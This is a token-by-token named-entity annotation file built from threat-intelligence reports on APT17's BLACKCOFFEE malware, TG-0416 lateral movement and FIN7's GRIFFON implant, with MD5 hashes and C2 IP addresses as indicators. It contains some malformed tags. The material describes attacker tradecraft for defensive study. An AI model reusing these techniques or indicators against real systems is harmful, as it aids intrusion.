some O
in O
the O
information O
security O
community O
call O
a O
“ O
dead O
drop O
resolver. O
” O
Encoding O
the O
IP O
address O
makes O
it O
more O
difficult O
to O
identify O
the O
true O
C2 S-TOOL
address O
for O
network O
security O
professionals O
. O

Few O
security O
companies O
have O
publicly O
discussed O
this O
tactic O
. O

After O
discovering O
the O
BLACKCOFFEE S-MAL
activity O
, O
the O
FireEye-Microsoft S-SECTEAM
team O
encoded O
a O
sinkhole O
IP O
address O
into O
the O
profile O
pages O
and O
forum O
threads O
and O
locked O
the O
accounts O
to O
prevent O
the O
threat O
actors O
from O
making O
any O
changes O
. O

This O
collaborative O
approach O
allowed O
the O
team O
to O
observe O
the O
malware O
and O
its O
victims O
. O

Though O
the O
security O
community O
has O
not O
yet O
broadly O
discussed O
this O
technique O
, O
FireEye S-SECTEAM
has O
observed O
other O
threat O
groups O
adopting O
these O
measures O
and O
expect O
this O
trend O
to O
continue O
on O
other O
community O
sites O
. O

Today O
, O
FireEye S-SECTEAM
released O
Indicators O
of O
Compromise O
( O
IOCs O
) O
for O
BLACKCOFFEE S-MAL
and O
Microsoft S-IDTY
released O
signatures O
for O
its O
anti-malware O
products O
. O

APT17 S-APT
, O
also O
known O
as O
DeputyDog S-APT
, O
is O
a O
Chinabased O
threat O
group O
that O
FireEye S-SECTEAM
Intelligence O
has O
observed O
conducting O
network O
intrusions O
against O
U.S. S-LOC
government O
entities O
, O
the O
defense O
industry O
, O
law O
firms O
, O
information O
technology O
companies O
, O
mining O
companies O
, O
and O
non-government O
organizations O
. O

BLACKCOFFEE S-MAL
’s O
functionality O
includes O
uploading O
and O
downloading O
files O
; O
creating O
a O
reverse O
shell O
; O
enumerating O
files O
and O
processes O
; O
renaming O
, O
moving O
, O
and O
deleting O
files O
; O
terminating O
processes O
; O
and O
expanding O
its O
functionality O
by O
adding O
new O
backdoor O
commands O
. O

FireEye S-SECTEAM
has O
monitored O
APT17 S-APT
’s O
use O
of O
BLACKCOFFEE S-MAL
variants O
since O
2013 O
to O
masquerade O
malicious O
communication O
as O
normal O
web O
traffic O
by O
disguising O
the O
C2 S-TOOL
communication O
as O
queries O
to O
web O
search O
engines O
. O

The O
use O
of O
BLACKCOFFEE S-MAL
demonstrates O
threat O
actors O
’ O
evolving O
use O
of O
public O
websites O
to O
hide O
in O
plain O
sight O
. O

In O
the O
past O
, O
threat O
actors O
would O
modify O
easily O
compromised O
websites O
to O
host O
C2 S-TOOL
commands O
and O
configuration O
, O
as O
observed O
in O
the O
China S-LOC
based O
APT1 S-APT
’s O
WEBC2 S-MAL
suite O
of O
backdoors O
. O

Now O
, O
threat O
actors O
are O
using O
well-known O
websites—that O
they O
do O
not O
need O
to O
compromise O
to O
host O
C2 S-TOOL
IP O
addresses O
. O

They O
simply O
use O
the O
website O
for O
legitimate O
purposes O
, O
such O
as O
posting O
forum O
threads O
or O
creating O
profile O
pages O
. O

APT17 S-APT
went O
further O
to O
obfuscate O
their O
C2 S-TOOL
IP O
address O
and O
employed O
a O
multi-layered O
approach O
for O
the O
malware O
to O
finally O
beacon O
the O
true O
C2 S-TOOL
IP O
. O

They O
used O
legitimate O
infrastructure—the O
ability O
to O
post O
or O
create O
comments O
on O
forums O
and O
profile O
pages—to O
embed O
a O
string O
that O
the O
malware O
would O
decode O
to O
find O
and O
communicate O
with O
the O
true O
C2 S-TOOL
IP O
address O
. O

This O
additional O
obfuscation O
puts O
yet O
another O
layer O
between O
APT17 S-APT
and O
the O
security O
professionals O
attempting O
to O
chase O
them O
down O
. O

This O
BLACKCOFFEE S-MAL
variant O
contains O
one O
or O
more O
URLs O
that O
link O
to O
the O
biography O
sections O
of O
attacker-created O
profiles O
as O
well O
as O
forum O
threads O
that O
contain O
comments O
from O
those O
same O
profiles O
. O

A O
URL O
is O
randomly O
selected O
and O
the O
malware O
searches O
at O
that O
location O
for O
an O
encoded O
IP O
address O
located O
between O
two O
tags O
, O
“ O
@MICR0S0FT O
” O
and O
“ O
C0RP0RATI0N O
” O
. O

The O
malware O
then O
communicates O
directly O
with O
the O
retrieved O
and O
decoded O
IP O
address O
to O
receive O
commands O
and O
send O
stolen O
information O
. O

If O
the O
C2 S-TOOL
server O
is O
discovered O
or O
shut O
down O
, O
the O
threat O
actors O
can O
update O
the O
encoded O
IP O
address O
on O
TechNet S-TOOL
to O
maintain O
control O
of O
the O
victims O
’ O
machines O
. O

BLACKCOFFEE S-MAL
supports O
an O
initial O
set O
of O
fifteen O
commands O
, O
including O
creating O
a O
reverse O
shell O
, O
uploading O
and O
downloading O
files O
, O
and O
enumerating O
files O
and O
processes O
. O

The O
attackers O
can O
also O
extend O
BLACKCOFFEE S-MAL
’s O
functionality O
through O
additional O
commands O
sent O
as O
shellcode O
. O

APT17 S-APT
: O
de56eb5046e518e266e67585afa34612 S-MD5
. O

APT17 S-APT
: O
195ade342a6a4ea0a58cfbfb43dc64cb S-MD5
. O

APT17 S-APT
: O
4c21336dad66ebed2f7ee45d41e6cada S-MD5
. O

APT17 S-APT
: O
0370002227619c205402c48bde4332f6 S-MD5
. O

APT17 S-APT
: O
ac169b7d4708c6fa7fee9be5f7576414 S-MD5
. O

APT17 S-APT
: O
130.184.156.62 S-IP
. O

APT17 S-APT
: O
69.80.72.165 S-IP
. O

APT17 S-APT
: O
110.45.151.43 S-IP
. O

APT17 S-APT
: O
121.101.73.231 S-IP
. O


APT18 S-APT
. O

Dell B-SECTEAM
SecureWorks I-SECTEAM
Counter I-SECTEAM
Threat I-SECTEAM
Unit E-SECTEAM
( O
CTU S-SECTEAM
) O
analysts O
were O
recently O
engaged O
with O
a O
client O
thought O
to O
have O
been O
compromised O
by O
a O
threat O
group O
CTU S-SECTEAM
researchers O
have O
named O
Threat B-APT
Group-0416 E-APT
( O
TG-0416 S-APT
) O
. O

Various O
artifacts O
from O
the O
initial O
phases O
of O
the O
incident O
provided O
strong O
indications O
of O
the O
existence O
of O
this O
particular O
threat O
group O
within O
the O
client's O
infrastructure O
. O

TG-0416 S-APT
is O
a O
stealthy O
and O
extremely O
successful O
Advanced O
Persistent O
Threat O
( O
APT O
) O
group O
known O
to O
target O
a O
broad O
range O
of O
verticals O
since O
at O
least O
2009 O
, O
including O
technology O
, O
industrial O
, O
manufacturing O
, O
human O
rights O
groups O
, O
government O
, O
pharmaceutical O
, O
and O
medical O
technology O
. O

The O
threat O
actors O
achieved O
an O
initial O
foothold O
into O
the O
infrastructure O
via O
phishing B-TOOL
email E-TOOL
that O
convinced O
victims O
to O
install O
the O
Xyligan S-MAL
remote O
access O
Trojan S-MAL
( O
RAT O
) O
on O
a O
system O
. O

The O
threat O
actors O
then O
installed O
the O
hcdLoader S-MAL
RAT O
, O
which O
installs O
as O
a O
Windows S-OS
service O
and O
provides O
command O
line O
access O
to O
the O
compromised O
system O
. O

Using O
host-based O
digital O
forensic O
analysis O
, O
CTU S-SECTEAM
analysts O
observed O
the O
intruders O
using O
the O
native O
‘ O
at.exe S-FILE
’ O
Windows S-OS
task O
scheduler O
tool O
to O
move O
laterally O
within O
the O
infrastructure O
. O

Many O
threat O
groups O
use O
lateral O
movement O
techniques O
, O
but O
this O
engagement O
allowed O
CTU S-SECTEAM
analysts O
to O
not O
only O
further O
validate O
indicators O
of O
lateral O
movement O
, O
but O
also O
to O
look O
a O
bit O
closer O
at O
those O
indicators O
and O
expand O
the O
cluster O
of O
indicators O
surrounding O
the O
use O
of O
at.exe S-FILE
for O
lateral O
movement O
within O
the O
infrastructure O
. O

Threat O
actors O
accessed O
the O
source O
host O
via O
the O
hcdLoader S-MAL
RAT O
. O

The O
sole O
indicator O
on O
the O
source O
host O
that O
at.exe S-FILE
had O
been O
run O
was O
an O
application O
Prefetch O
file O
( O
C:\Windows\Prefetch\AT.EXE-BB02E639.pf S-FILE
) O
that O
was O
created O
when O
the O
tool O
was O
executed O
. O

Beyond O
the O
file O
system O
metadata O
for O
the O
Prefetch S-TOOL
file O
( O
creation O
and O
last O
modification O
times O
) O
and O
the O
last O
execution O
time O
within O
the O
file O
metadata O
, O
CTU S-SECTEAM
analysts O
did O
not O
observe O
any O
indicators O
of O
value O
on O
the O
source O
host O
. O

Two O
files O
are O
created O
for O
the O
task O
at O
approximately O
the O
same O
time O
: O
C:\Windows\System32\Tasks\At1 O
and O
C:\Windows\Tasks\At1.job S-FILE
. O

The O
first O
file O
is O
an O
Extensible B-TOOL
Markup I-TOOL
Language E-TOOL
( O
XML S-TOOL
) O
file O
that O
can O
be O
opened O
and O
viewed O
in O
a O
text O
editor O
. O

The O
second O
file O
follows O
a O
decodable O
binary O
format O
. O

The O
operating O
system O
also O
creates O
a O
registry O
key O
within O
the O
software O
registry O
hive O
that O
is O
specifically O
associated O
with O
the O
creation O
of O
the O
scheduled O
task O
on O
the O
destination O
host O
: O
Microsoft\Windows S-OS
NT\CurrentVersion\Schedule\TaskCache\Tree\At1 O
. O

The O
Task O
Scheduler O
service O
names O
the O
tasks O
, O
so O
subsequent O
tasks O
are O
named O
At2 O
, O
At3 O
, O
and O
so O
on O
. O


FIN7.5 S-APT
: O
the O
infamous O
cybercrime O
rig O
FIN7 S-APT
continues O
its O
activities O
. O

On O
August B-TIME
1, I-TIME
2018 E-TIME
, O
the O
US S-LOC
Department B-IDTY
of I-IDTY
Justice E-IDTY
announced O
that O
it O
had O
arrested O
several O
individuals O
suspected O
of O
having O
ties O
to O
the O
FIN7 S-APT
cybercrime O
rig O
. O

FIN7 S-APT
operations O
are O
linked O
to O
numerous O
intrusion O
attempts O
having O
targeted O
hundreds O
of O
companies O
since O
at O
least O
as B-TIME
early I-TIME
as I-TIME
2015 E-TIME
. O

Interestingly O
, O
this O
threat O
actor O
created O
fake O
companies O
in O
order O
to O
hire O
remote O
pentesters O
, O
developers O
and O
interpreters O
to O
participate O
in O
their O
malicious O
business O
. O

The O
main O
goal O
behind O
its O
malicious O
activities O
was O
to O
steal O
financial O
assets O
from O
companies O
, O
such O
as O
debit O
cards O
, O
or O
get O
access O
to O
financial O
data O
or O
computers O
of O
finance O
department O
employees O
in O
order O
to O
conduct O
wire O
transfers O
to O
offshore O
accounts O
. O

In O
2018-2019 S-TIME
, O
researchers O
of O
Kaspersky B-SECTEAM
Lab E-S-SECTEAM
’s O
Global B-SECTEAM
Research I-SECTEAM
and I-SECTEAM
Analysis I-SECTEAM
Team E-SECTEAM
analyzed O
various O
campaigns O
that O
used O
the O
same O
Tactics O
Tools O
and O
Procedures O
( O
TTPs O
) O
as O
the O
historic O
FIN7 S-APT
, O
leading O
the O
researchers O
to O
believe O
that O
this O
threat O
actor O
had O
remained O
active O
despite O
the O
2018 S-TIME
arrests O
. O

In O
addition O
, O
during O
the O
investigation O
, O
we O
discovered O
certain O
similarities O
to O
other O
attacker O
groups O
that O
seemed O
to O
share O
or O
copy O
the O
FIN7 S-APT
TTPs O
in O
their O
own O
operations O
. O

The O
FIN7 S-APT
intrusion O
set O
continued O
its O
tailored O
spear B-ACT
phishing E-ACT
campaigns O
throughout O
last B-TIME
year E-TIME
. O

Kaspersky B-SECTEAM
Lab E-SECTEAM
has O
been O
able O
to O
retrieve O
some O
of O
these O
exchanges O
from O
a O
FIN7 S-APT
target O
. O

The O
spear B-ACT
phishing E-ACT
campaigns O
were O
remarkably O
sophisticated O
from O
a O
social O
engineering O
perspective O
. O

In O
various O
cases O
, O
the O
operators O
exchanged O
numerous O
messages O
with O
their O
victims O
for O
weeks O
before O
sending O
their O
malicious O
documents O
. O

The O
emails S-TOOL
were O
efficient O
social-engineering O
attempts O
that O
appealed O
to O
a O
vast O
number O
of O
human O
emotions O
( O
fear O
, O
stress O
, O
anger O
, O
etc. O
) O
to O
elicit O
a O
response O
from O
their O
victims O
. O

One O
of O
the O
domains O
used O
by O
the O
attackers O
in O
their O
2018 S-TIME
campaign O
of O
spear B-ACT
phishing E-ACT
contained O
more O
than O
130 O
email S-TOOL
aliases O
, O
leading O
us O
to O
think O
that O
more O
than O
130 O
companies O
had O
been O
targeted O
by O
the B-TIME
end I-TIME
of I-TIME
2018 E-TIME
. O

We O
have O
seen O
two O
types O
of O
documents O
sent O
to O
victims O
in O
these O
spear B-ACT
phishing E-ACT
campaigns O
. O

The O
first O
one O
exploits O
the O
INCLUDEPICTURE S-TOOL
feature O
of O
Microsoft S-IDTY
Word S-TOOL
to O
get O
context O
information O
about O
the O
victim’s O
computer O
, O
and O
the O
availability O
and O
version O
number O
of O
Microsoft S-IDTY
Word S-TOOL
. O

The O
second O
one O
, O
which O
in O
many O
cases O
is O
an O
Office S-TOOL
document O
protected O
with O
a O
trivial O
password O
, O
such O
as O
“ O
12345 O
” O
, O
“ O
1234 O
” O
, O
etc. O
, O
uses O
macros S-TOOL
to O
execute O
a O
GRIFFON S-MAL
implant O
on O
the O
target’s O
computer O
. O

In O
various O
cases O
, O
the O
associated O
macro S-TOOL
also O
scheduled O
tasks O
to O
make O
GRIFFON S-MAL
persistent O
. O

Interestingly O
, O
following O
some O
open-source O
publications O
about O
them O
, O
the O
FIN7 S-APT
operators O
seems O
to O
have O
developed O
a O
homemade O
builder O
of O
malicious O
Office S-TOOL
document O
using O
ideas O
from O
ThreadKit S-MAL
, O
which O
they O
employed O
during O
the B-TIME
summer I-TIME
of I-TIME
2018 E-TIME
. O

The O
new O
builder O
inserts O
random O
values O
in O
the O
Author O
and O
Company O
metadata O
fields O
. O

Moreover O
, O
the O
builder O
allows O
these O
to O
modify O
different O
IOCs S-TOOL
, O
such O
as O
the O
filenames O
of O
wscript.exe S-FILE
or O
sctasks.exe S-FILE
copies O
, O
etc O
. O

The O
GRIFFON S-MAL
implant O
is O
a O
lightweight O
JScript S-TOOL
validator-style O
implant O
without O
any O
persistence O
mechanism O
. O

The O
malware O
is O
designed O
for O
receiving O
modules O
to O
be O
executed O
in-memory O
and O
sending O
the O
results O
to O
C2s O
. O

We O
were O
able O
to O
obtain O
four O
different O
modules O
during O
the O
investigation O
. O

The O
first O
module O
downloaded O
by O
the O
GRIFFON S-MAL
malware O
to O
the O
victim’s O
computer O
is O
an O
information-gathering O
JScript S-TOOL
, O
which O
allows O
the O
cybercriminals O
to O
understand O
the O
context O
of O
the O
infected O
workstation O
. O

This O
module O
mainly O
relies O
on O
WMI S-TOOL
and O
Windows S-OS
objects O
to O
deliver O
results O
, O
which O
will O
be O
sent O
back O
to O
the O
operators O
. O

Interestingly O
, O
more O
than O
20 O
artifacts O
are O
retrieved O
from O
the O
system O
by O
this O
implant O
during O
the O
reconnaissance O
stage O
, O
from O
the O
date O
and O
time O
of O
operating O
system O
installation O
and O
membership O
in O
a O
Windows S-OS
domain O
to O
a O
list O
of O
and O
the O
resolutions O
of O
the O
workstation’s O
monitors O
. O

The O
second O
module O
is O
used O
by O
the O
operators O
to O
execute O
an O
obfuscated O
PowerShell S-TOOL
script O
, O
which O
contains O
a O
Meterpreter S-TOOL
downloader S-TOOL
widely O
known O
as O
“ O
Tinymet S-TOOL
“ O
. O

This O
downloader S-TOOL
, O
seen O
in O
past O
FIN7 S-APT
campaigns O
, O
downloads O
a O
one-byte O
XOR S-ENCR
encrypted O
( O
eg. O
with O
the O
key O
equal O
to O
0x50 O
or O
0x51 O
) O
piece O
of O
meterpreter S-TOOL
shellcode O
to O
execute O
. O

The O
third O
module O
allows O
the O
operators O
to O
take O
a O
screenshot O
of O
the O
remote O
system O
. O

To O
do O
that O
, O
it O
also O
drops O
a O
PowerShell S-TOOL
script O
on O
the O
workstation O
to O
execute O
. O

The O
script O
executes O
an O
open-source O
.NET S-FILE
class O
used O
for O
taking O
a O
screenshot O
. O

The O
resulting O
screenshot O
is O
saved O
at O
“ O
%TMP%/image.png S-FILE
” O
, O
sent O
back O
to O
the O
attackers O
by O
the O
GRIFFON S-MAL
implant O
and O
then O
deleted O
. O

The O
last O
retrieved O
module O
is O
a O
persistence O
module O
. O

If O
the O
victim O
appears O
valuable O
to O
the O
attackers O
, O
a O
GRIFFON S-MAL
implant O
installer S-TOOL
is O
pushed O
to O
the O
victim’s O
workstation O
. O

This O
module O
stores O
another O
instance O
of O
the O
GRIFFON S-MAL
implant O
inside O
the O
registry O
to O
achieve O
persistence O
. O

Here O
is O
a O
PowerLinks S-TOOL
style O
method O
used O
by O
the O
attackers O
to O
achieve O
persistence O
and O
execute O
the O
GRIFFON S-MAL
implant O
at O
each O
user O
logon O
. O

The O
new O
GRIFFON S-MAL
implant O
is O
written O
to O
the O
hard O
drive O
before O
each O
execution O
, O
limiting O
the O
“ O
file-less O
” O
aspect O
of O
this O
method O
. O

Through O
its O
light O
weight O
and O
modular O
architecture O
, O
the O
GRIFFON S-MAL
implant O
is O
the O
perfect O
validator O
. O

Even O
though O
we O
have O
been O
able O
to O
retrieve O
four O
different O
modules O
, O
it O
is O
possible O
that O
the O
FIN7 S-APT
operators O
have O
more O
modules O
in O
their O
toolsets O
for O
achieving O
their O
objectives O
on O
the O
victim’s O
workstation O
. O

Attackers O
make O
mistakes O
, O
and O
FIN7 S-APT
are O
no O
exception O
. O

The O
major O
error O
made O
by O
its O
operators O
allowed O
us O
to O
follow O
the O
command O
and O
control O
server O
of O
the O
GRIFFON S-MAL
implant O
last B-TIME
year E-TIME
. O

In O
order O
to O
trick O
blue O
teams O
and O
other O
DFIR S-TOOL
analysts O
, O
the O
operators O
created O
fake O
HTTP S-PROT
302 O
redirection O
to O
various O
Google S-IDTY
services O
on O
their O
C2s O
servers O
. O

This O
error O
allowed O
us O
to O
follow O
the O
infrastructure O
week O
by O
week O
, O
until O
an O
individual O
pushed O
on O
Twitter S-IDTY
the O
heuristic O
to O
track O
their O
C2 S-TOOL
at O
the B-TIME
end I-TIME
of I-TIME
December I-TIME
2018 E-TIME
. O

A O
few O
days O
after O
the O
tweet O
, O
in O
January B-TIME
2019 E-TIME
, O
the O
operators O
changed O
their O
landing O
page O
in O
order O
to O
prevent O
this O
type O
of O
tracking O
against O
their O
infrastructure O
. O

During O
the O
investigation O
related O
to O
the O
GRIFFON S-MAL
infrastructure O
, O
we O
found O
a O
strange O
overlap O
between O
the O
WHOIS S-TOOL
record O
of O
an O
old O
GRIFFON S-MAL
C2 S-TOOL
and O
the O
website O
of O
a O
fake O
company O
. O

According O
to O
the O
website O
, O
that O
domain O
supposedly O
belongs O
to O
a O
legitimate O
security O
company O
“ O
fully O
owned O
by O
the O
Russian B-IDTY
Government E-IDTY
” O
( O
sic O
. O
) O
and O
having O
offices O
in O
“ O
Moscow S-LOC
, O
Saint B-LOC
Petersburg E-LOC
and O
Yekaterinburg S-LOC
” O
, O
but O
the O
address O
says O
the O
company O
is O
located O
in O
Trump B-IDTY
Tower E-IDTY
, O
in O
New B-LOC
York E-LOC
. O

Given O
FIN7 S-APT
’s O
previous O
use O
of O
false O
security O
companies O
, O
we O
decided O
to O
look O
deeper O
into O
this O
one O
. O

As O
we O
were O
looking O
at O
the O
content O
of O
the O
website O
, O
it O
became O
evident O
that O
almost O
all O
of O
the O
text O
used O
was O
lifted O
from O
legitimate O
security-company O
websites O
. O

Phrases O
and O
sentences O
were O
borrowed O
from O
at O
least O
the O
following O
companies/sites O
: O
DKSec S-IDTY
– O
www.dksec.com S-DOM
, O
OKIOK S-IDTY
– O
www.okiok.com/services/tailored-solutions S-DOM
, O
MainNerve S-IDTY
– O
www.mainnerve.com S-DOM
, O
Datics S-IDTY
– O
www.datatics.com/cyber-security S-DOM
, O
Perspective B-IDTY
Risk E-IDTY
– O
www.perspectiverisk.com S-DOM
, O
Synack S-IDTY
– O
https://www.synack.com/company S-DOM
, O
FireEye S-IDTY
– O
https://www.fireeye.com/services/penetration-testing.html S-URL
. O

This O
company O
seems O
to O
have O
been O
used O
by O
the O
FIN7 S-APT
threat O
actor O
to O
hire O
new O
people O
as O
translators O
, O
developers O
and O
pentesters O
. O

During O
our O
research O
, O
we O
found O
various O
job O
advertisements O
associated O
with O
the O
company O
on O
freelance O
and O
remote-work O
websites O
. O

While O
tracking O
numerous O
threat O
actors O
on O
a O
daily O
basis O
during O
the B-TIME
final I-TIME
days I-TIME
of I-TIME
2018 E-TIME
and O
at O
the B-TIME
beginning I-TIME
of I-TIME
2019 E-TIME
, O
we O
discovered O
various O
activity O
clusters O
sharing O
certain O
TTPs O
associated O
with O
the O
FIN7 S-APT
intrusion O
set O
. O

The O
link O
between O
these O
threat O
actors O
and O
FIN7 S-APT
is O
still O
weak O
, O
but O
we O
decided O
to O
disclose O
a O
few O
hints O
regarding O
these O
in O
this O
blog O
post O
. O

In O
his O
history O
, O
FIN7 S-APT
has O
overlapped O
several O
times O
with O
Cobalt S-MAL/EmpireMonkey S-MAL
in O
terms O
of O
TTPs O
. O

This O
activity O
cluster O
, O
which O
Kaspersky O
Lab O
has O
followed O
for O
a O
few O
years O
, O
uses O
various O
implants O
for O
targeting O
mainly O
banks O
, O
and O
developers O
of O
banking O
and O
money O
processing O
software O
solutions O
. O

At O
the B-TIME
end I-TIME
of I-TIME
2018 E-TIME
, O
the O
cluster O
started O
to O
use O
not O
only O
CobaltStrike S-TOOL
but O
also O
Powershell S-TOOL
Empire S-TOOL
in O
order O
to O
gain O
a O
foothold O
on O
the O
victims’ O
networks O
. O

After O
a O
successful O
penetration O
, O
it O
uses O
its O
own O
backdoors O
and O
the O
CobaltStrike S-TOOL
framework O
or O
Powershell S-TOOL
Empire S-TOOL
components O
to O
hop O
to O
interesting O
parts O
of O
the O
network O
, O
where O
it O
can O
monetize O
its O
access O
. O

FIN7 S-APT
’s O
last O
campaigns O
were O
targeting O
banks O
in O
Europe S-LOC
and O
Central B-LOC
America E-LOC
. O

This O
threat O
actor O
stole O
suspected O
of O
stealing O
€13 O
million O
from O
Bank O
of O
Valetta S-LOC
, O
Malta S-LOC
earlier B-TIME
this I-TIME
year E-TIME
. O

A O
few O
interesting O
overlaps O
in O
recent O
FIN7 S-APT
campaigns O
: O
Both O
used O
macros S-TOOL
to O
copy O
wscript.exe S-FILE
to O
another O
file O
, O
which O
began O
with O
“ O
ms O
” O
( O
mses.exe S-FILE
– O
FIN7 S-APT
, O
msutil.exe S-FILE
– O
EmpireMonkey S-MAL
) O
. O

Both O
executed O
a O
JScript S-TOOL
file O
named O
“ O
error O
” O
in O
%TEMP% O
( O
Errors.txt S-FILE
in O
the O
case O
of O
FIN7 S-APT
, O
Errors.bat S-FILE
for O
EmpireMonkey S-MAL
) O
. O

Both O
used O
DocuSign S-TOOL
decoy O
documents O
with O
different O
macros S-TOOL
. O

The O
macros S-TOOL
popped O
the O
same O
“ O
Document O
decryption O
error O
” O
error O
message—even O
if O
macro S-TOOL
code O
remain O
totally O
different O
. O

We O
have O
a O
high O
level O
of O
confidence O
in O
a O
historic O
association O
between O
FIN7 S-APT
and O
Cobalt S-MAL
, O
even O
though O
we O
believe O
that O
these O
two O
clusters O
of O
activity O
are O
operated O
by O
different O
teams O
. O

AveMaria S-MAL
is O
a O
new O
botnet O
, O
whose O
first O
version O
we O
found O
in O
September B-TIME
2018 E-TIME
, O
right O
after O
the O
arrests O
of O
the O
FIN7 S-APT
members O
. O

We O
have O
medium O
confidence O
that O
this O
botnet O
falls O
under O
the O
FIN7 S-APT
umbrella O
. O

In O
fact O
, O
AveMaria S-MAL
is O
a O
classic O
infostealer O
bot O
that O
collects O
all O
possible O
credentials O
from O
various O
types O
of O
software O
: O
browsers O
, O
email S-TOOL
clients O
, O
messengers O
, O
etc. O
, O
and O
can O
act O
as O
a O
keylogger O
. O

Since O
the B-TIME
beginning I-TIME
of I-TIME
2019 E-TIME
, O
we O
have O
collected O
more O
than O
1300 O
samples O
and O
extracted O
more O
than O
130 O
C2s O
. O

To O
deliver O
their O
malware O
, O
the O
cyber O
criminals O
use O
spearphishing S-ACT
emails S-TOOL
with O
various O
types O
of O
attachments O
: O
MS S-IDTY
Office S-TOOL
documents O
or O
spreadsheet O
files O
exploiting O
some O
known O
vulnerability O
like O
CVE-2017-11882 S-VULID
, O
or O
documents O
with O
Ole2Link S-VULNAME
and O
SCT S-VULNAME
. O

They O
also O
use O
AutoIT S-TOOL
droppers O
, O
password-protected O
EXE S-TOOL
files O
and O
even O
ISO S-TOOL
images O
. O

What O
is O
interesting O
, O
in O
some O
emails S-TOOL
, O
they O
ask O
targets O
to O
phone O
them O
if O
they O
have O
any O
questions O
, O
like O
the O
FIN7 S-APT
guys O
do O
. O

During O
the O
investigation O
into O
FIN7 S-APT
, O
our O
threat-hunting O
systems O
found O
an O
interesting O
overlap O
in O
between O
the O
infrastructure O
of O
FIN7 S-APT
and O
AveMaria S-MAL
. O

Basically O
, O
two O
servers O
in O
the O
same O
IP O
range O
and O
AS14576 O
( O
autonomous O
system O
) O
share O
a O
non-standard O
SSH S-PROT
port O
, O
which O
is O
222 O
. O

One O
of O
the O
servers O
is O
a O
Griffon S-MAL
C2, O
and O
the O
other O
one O
, O
an O
AveMaria S-MAL
C2 S-TOOL
. O

Distribution O
of O
targets O
is O
another O
factor O
suggesting O
that O
these O
two O
malware O
families O
may O
be O
connected O
. O

We O
analyzed O
AveMaria S-MAL
targets O
during O
February B-TIME
and I-TIME
March I-TIME
of I-TIME
2019 E-TIME
. O

The O
spearphishing S-ACT
emails S-TOOL
were O
sent O
to O
various O
kinds O
of O
businesses O
only O
and O
did O
not O
target O
individuals O
. O

Thirty O
percent O
of O
the O
targets O
were O
small O
and O
medium-sized O
companies O
that O
were O
suppliers O
or O
service O
providers O
for O
bigger O
players O
and O
21% O
were O
various O
types O
of O
manufacturing O
companies O
. O

We O
also O
spotted O
several O
typical O
FIN7 S-APT
targets O
, O
such O
as O
retailers O
and O
hotels O
. O

Most O
AveMaria S-MAL
targets O
( O
72% O
) O
were O
in O
the O
EU S-IDTY
. O

At O
the B-TIME
end I-TIME
of I-TIME
2018 E-TIME
, O
while O
searching O
for O
new O
FIN7 S-APT
campaigns O
via O
telemetry O
, O
we O
discovered O
a O
set O
of O
activity O
that O
we O
temporarily O
called O
“ O
CopyPaste S-APT
” O
from O
a O
previously O
unknown O
APT O
. O

Interestingly O
, O
this O
actor O
targeted O
financial O
entities O
and O
companies O
in O
one O
African O
country O
, O
which O
lead O
us O
to O
think O
that O
CopyPaste S-APT
was O
associated O
with O
cybermercenaries O
or O
a O
training O
center O
. O

This O
set O
of O
activity O
relied O
on O
open-source O
tools O
, O
such O
as O
Powershell S-TOOL
Empire S-TOOL
, O
and O
well-documented O
red O
teaming O
techniques O
, O
in O
order O
to O
get O
a O
foothold O
within O
the O
victim’s O
networks O
and O
avoid O
detection O
. O

The O
links O
between O
CopyPaste S-APT
and O
FIN7 S-APT
are O
still O
very O
weak O
. O

It O
is O
possible O
that O
the O
CopyPaste S-APT
operators O
were O
influenced O
by O
open-source O
publications O
and O
do O
not O
have O
any O
ties O
with O
FIN7 S-APT
. O

During O
2018 S-TIME
, O
Europol S-IDTY
and O
DoJ S-IDTY
announced O
the O
arrest O
of O
the O
leader O
of O
the O
FIN7 S-APT
and O
Carbanak S-APT/CobaltGoblin S-APT
cybercrime O
groups O
. O

It O
was O
believed O
that O
the O
arrest O
of O
the O
group O
leader O
will O
have O
an O
impact O
on O
the O
group’s O
operations O
. O

However O
, O
recent O
data O
seems O
to O
indicate O
that O
the O
attacks O
have O
continued O
without O
significant O
drawbacks O
. O

One O
may O
say O
CobaltGoblin S-APT
and O
FIN7 S-APT
have O
even O
extended O
the O
number O
of O
groups O
operating O
under O
their O
umbrella O
. O

We O
observe O
, O
with O
various O
level O
of O
confidence O
, O
that O
there O
are O
several O
interconnected O
groups O
using O
very O
similar O
toolkits O
and O
the O
same O
infrastructure O
to O
conduct O
their O
cyberattacks O
. O

The O
first O
of O
them O
is O
the O
well-known O
FIN7 S-APT
, O
which O
specializes O
in O
attacking O
various O
companies O
to O
get O
access O
to O
financial O
data O
or O
PoS S-TOOL
infrastructure O
. O

They O
rely O
on O
a O
Griffon S-MAL
JS S-TOOL
backdoor O
and O
Cobalt S-MAL/Meterpreter S-TOOL
, O
and O
in O
recent O
attacks O
, O
Powershell S-TOOL
Empire S-TOOL
. O

The O
second O
one O
is O
CobaltGoblin S-APT/Carbanak S-APT/EmpireMonkey S-APT
, O
which O
uses O
the O
same O
toolkit O
, O
techniques O
and O
similar O
infrastructure O
but O
targets O
only O
financial O
institutions O
and O
associated O
software/services O
providers O
. O

We O
link O
the O
AveMaria S-MAL
botnet O
to O
these O
two O
groups O
with O
medium O
confidence O
: O
AveMaria S-MAL
’s O
targets O
are O
mostly O
suppliers O
for O
big O
companies O
, O
and O
the O
way O
AveMaria S-MAL
manages O
its O
infrastructure O
is O
very O
similar O
to O
FIN7 S-APT
. O

The O
last O
piece O
is O
the O
newly O
discovered O
CopyPaste S-APT
group O
, O
who O
targeted O
financial O
entities O
and O
companies O
in O
one O
African O
country O
, O
which O
lead O
us O
to O
think O
that O
CopyPaste S-APT
was O
associated O
with O
cybermercenaries O
or O
a O
training O
center O
. O

The O
links O
between O
CopyPaste S-APT
and O
FIN7 S-APT
are O
still O
very O
weak O
. O

It O
is O
possible O
that O
the O
operators O
of O
this O
cluster O
of O
activity O
were O
influenced O
by O
open-source O
publications O
and O
do O
not O
have O
any O
ties O
with O
FIN7 S-APT
. O

All O
of O
the O
aforementioned O
groups O
greatly O
benefit O
from O
unpatched O
systems O
in O
corporate O
environments O
. O

They O
thus O
continue O
to O
use O
effective O
spearphishing S-ACT
campaigns O
in O
conjunction O
with O
well-known O
MS S-IDTY
Office S-TOOL
exploits O
generated O
by O
the O
framework O
. O

So O
far O
, O
the O
groups O
have O
not O
used O
any O
zero-days S-VULNAME
. O

FIN7 S-APT/Cobalt S-MAL
phishing E-ACT
documents O
may O
seem O
basic O
, O
but O
when O
combined O
with O
their O
extensive O
social O
engineering O
and O
focused O
targeting O
, O
they O
are O
quite O
successful O
. O
